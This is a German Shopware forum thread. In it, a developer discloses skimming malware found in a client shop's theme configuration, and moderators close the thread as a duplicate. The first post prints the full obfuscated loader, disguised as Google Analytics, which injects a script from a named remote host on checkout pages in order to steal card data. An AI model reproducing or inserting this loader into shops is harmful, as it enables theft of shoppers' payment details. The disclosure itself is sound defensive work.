# Shopware spezifische Malware gefunden

**URL:** <https://forum.shopware.com/t/shopware-spezifische-malware-gefunden/100406>\
**Category:** Allgemein\
**Tags:** general\
**Created:** [6. Juli 2023 um 08:38 UTC](https://forum.shopware.com/t/shopware-spezifische-malware-gefunden/100406 "2023-07-06T08:38:33Z")\
**Posts on this page:** 4\
**Page:** 1

<div class="post-metadata">

**Author:** ![daniel.naumann](https://avatars.discourse-cdn.com/v4/letter/d/db5fbb/32.png) [@daniel.naumann](https://forum.shopware.com/u/daniel.naumann)\
**Post date:** [6. Juli 2023 um 08:38 UTC](https://forum.shopware.com/t/shopware-spezifische-malware-gefunden/100406/1 "2023-07-06T08:38:34Z")

</div>

Hi,

wir haben bei einem Kunden eine Shopware spezifische Malware entdeckt, welche auf uns unbekannte Weise in der Theme Konfiguration gelandet ist, und ein JS lädt welches wiederum beim Paypal Checkout eingreift und den Kunden statt auf Paypal auf eine eigene Maske innerhalb des Shops leitet um Kreditkartendaten abzugreifen. Aufgefallen ist es, da das Virenprogramm Eset die Malware erkannt hat.

Der schädliche Script sieht wie folgt aus. Ist quasi als Google Analytics script getarnt, und auch die Scripte die dadurch nachgeladen werden, sind als Trustedshops Script und GA getarnt und wird von folgender URL abgerufen.

[webstatics.org/trustbadge/DE.1bc5594646596f40faa8.chunk.js](http://webstatics.org/trustbadge/DE.1bc5594646596f40faa8.chunk.js)

```auto
(function(n,x,b,z,i,y,m,o){z['GoogleAnalyticsObjects']=o;y=i.createElement (x),n=i.getElementsByTagName(x)[0];if(b.href.match(new RegExp(atob(o)))){y.async=1;y.src='//'+z.atob(m);n.parentNode.insertBefore(y,n)}}) ('fu','script',window.location,window,document,'//www.google-analytics.com/analytics.js','d2Vic3RhdGljcy5vcmcvdHJ1c3RiYWRnZS9ERS4xYmM1NTk0NjQ2NTk2ZjQwZmFhOC5jaHVuay5qcw==','Y2hlY2tvdXQ=');

```

Wir hoffen mit dem Beitrag einige Erfolge dieser Software verhindern zu können.

 ![Bildschirmfoto 2023-07-06 um 10.17.40](https://europe1.discourse-cdn.com/flex013/uploads/shopware/original/3X/e/3/e35659a08c031c2a0a2d47ef1519c8c0dcf5a02a.png)

---

<div class="post-metadata">

**Author:** ![sonic](https://dub1.discourse-cdn.com/flex013/user_avatar/forum.shopware.com/sonic/32/25728_2.png) [@sonic](https://forum.shopware.com/u/sonic)\
**Post date:** [6. Juli 2023 um 08:42 UTC](https://forum.shopware.com/t/shopware-spezifische-malware-gefunden/100406/2 "2023-07-06T08:42:52Z")

</div>

bischen weiter unten:  
[https://forum.shopware.com/t/schadenscode-js-integration/](https://forum.shopware.com/t/schadenscode-js-integration/)

---

<div class="post-metadata">

**Author:** ![Michael\_Telgmann](https://dub1.discourse-cdn.com/flex013/user_avatar/forum.shopware.com/michael_telgmann/32/20289_2.png) [@Michael\_Telgmann](https://forum.shopware.com/u/Michael_Telgmann)\
**Post date:** [6. Juli 2023 um 10:45 UTC](https://forum.shopware.com/t/shopware-spezifische-malware-gefunden/100406/3 "2023-07-06T10:45:36Z")

</div>



---

<div class="post-metadata">

**Author:** ![Michael\_Telgmann](https://dub1.discourse-cdn.com/flex013/user_avatar/forum.shopware.com/michael_telgmann/32/20289_2.png) [@Michael\_Telgmann](https://forum.shopware.com/u/Michael_Telgmann)\
**Post date:** [6. Juli 2023 um 10:46 UTC](https://forum.shopware.com/t/shopware-spezifische-malware-gefunden/100406/4 "2023-07-06T10:46:10Z")

</div>

Hallo,

ich hab den Thread mal wegen Duplicate geschlossen 😉

Viele Grüße aus Schöppingen  
Michael Telgmann
